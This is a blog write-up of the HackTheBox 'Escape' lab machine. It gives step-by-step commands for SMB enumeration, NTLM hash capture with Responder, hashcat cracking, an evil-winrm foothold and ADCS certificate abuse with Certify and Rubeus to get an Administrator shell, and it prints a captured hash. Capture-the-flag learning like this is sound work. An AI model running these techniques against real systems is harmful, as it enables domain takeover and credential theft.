pheelbert

We're all earthlings

2 June 2023

HackTheBox: Escape

Noter box information card

Introduction

No introduction needed! Here’s a link to the badge of completion for this box.

Recon

Perform a port scan on the box: nmap -sV --version-all -p- -T5 10.10.11.202

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-05-30 03:56:31Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49687/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         syn-ack Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack Microsoft Windows RPC
49710/tcp open  msrpc         syn-ack Microsoft Windows RPC
49722/tcp open  msrpc         syn-ack Microsoft Windows RPC

SMB/445

When I see SMB, the first think I do is check the available shares (i.e.: CrackMapExec):

$ crackmapexec smb 10.10.11.202 -u '' -p '' --shares

Doing so reveals the Public share with a PDF file containing read-only credentials for the MSSQL service running on the box.

Searching for secrets

Using Metasploit’s admin/mssql/mssql_ntlm_stealer module, it is possible to capture the NTLMv2-SSP hash for the sql_svc user by providing our read-only credentials and running an interception tool such as Responder.

Responder output:

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:3ad4698fb4bb5c08:C20D12D6EA8F1367BB5B0F3DE6AA3EE1:01010000000000000054934B9192D901B3A2E9EE565C538B0000000002000800480051003600520001001E00570049004E002D004C004F0055005A00310048003600580046005000580004003400570049004E002D004C004F0055005A0031004800360058004600500058002E0048005100360052002E004C004F00430041004C000300140048005100360052002E004C004F00430041004C000500140048005100360052002E004C004F00430041004C00070008000054934B9192D901060004000200000008003000300000000000000000000000003000009C162DF9553435D110947123796AA01BD32519602342A02475314BF55A930A980A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00350032000000000000000000

This hash can be cracked using Hashcat with the following command (rules may not be necessary, I typically run rules since I have access to a good cracking rig): hashcat -m 5600 hashes.lst /srv/wordlists/rockyou.txt -r /srv/rules/OneRuleToRuleThemAll.rule

Foothold

Using the cracked credentials for sql_svc, we can run enumerate active directory using Bloodhound. The user is not a local administrator, however he is part of the Remote Management Users group. I tried logging in using Impacket’s (wmi|ps|smb|at)exec.py scripts but none worked, neither did CrackMapExec, however evil-winrm worked like a charm and got me an interactive shell on the box.

Privilege escalation

Once on the file system, you had to look for some log files in C:\SQLServer\Logs\ which contained log entries showing a user trying to log in wrongfully to the database using their domain credentials. From this new user context using evil-winrm again, PKI abuse enumeration had to be done.

Using Certify, this can be done with the following commands from our new user context Ryan.Cooper. This can also be done using completely using python tools instead of directly on the compromised host.

  1. List vulnerable certificate templates
      $ Certify.exe find /vulnerable
    
  2. Request vulnerable certificate template for a specific user that has admin rights on the host
      $ Certify.exe request /ca:dc.sequel.htb\\sequel-DC-CA /template:UserAuthentication /altname:Administrator
    
  3. Copy the certificate contents to a file and convert from .pem to .pfx (done on linux box)
      $ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
    
  4. Request a TGT using the certificate (outputs a base64 blob)
      $ Rubeus.exe asktgt /user:Administrator /certificate:c:\\Windows\\Temp\\cert.pfx /nowrap
    
  5. Convert the base64 blob to .ccache for use on linux
      $ python3 rubeustoccache.py <rubeus_base64_output_nowrap> administrator.kirbi administrator.ccache
    
  6. Get a an interactive shell on the host using Impacket’s psexec by passing the ticket
      $ sudo ntpdate DC.sequel.htb
      $ export KRB5CCNAME=administrator.ccache
      $ psexec.py sequel.htb/Administrator@DC.sequel.htb -k -no-pass
    

It’s necessary to have DNS working correctly for Kerberos authentication, here are the contents of /etc/resolv.conf:

search sequel htb
nameserver 10.10.11.202

Conclusion

This box was great for me to test out Sliver and Mythic as well as PKI abuse. Respect to Geiseric for their work! I’m not sure if there were any hints regarding ADCS being abusable, but I’m guessing this should be part of all pentester’s toolkit and general reconnaissance steps.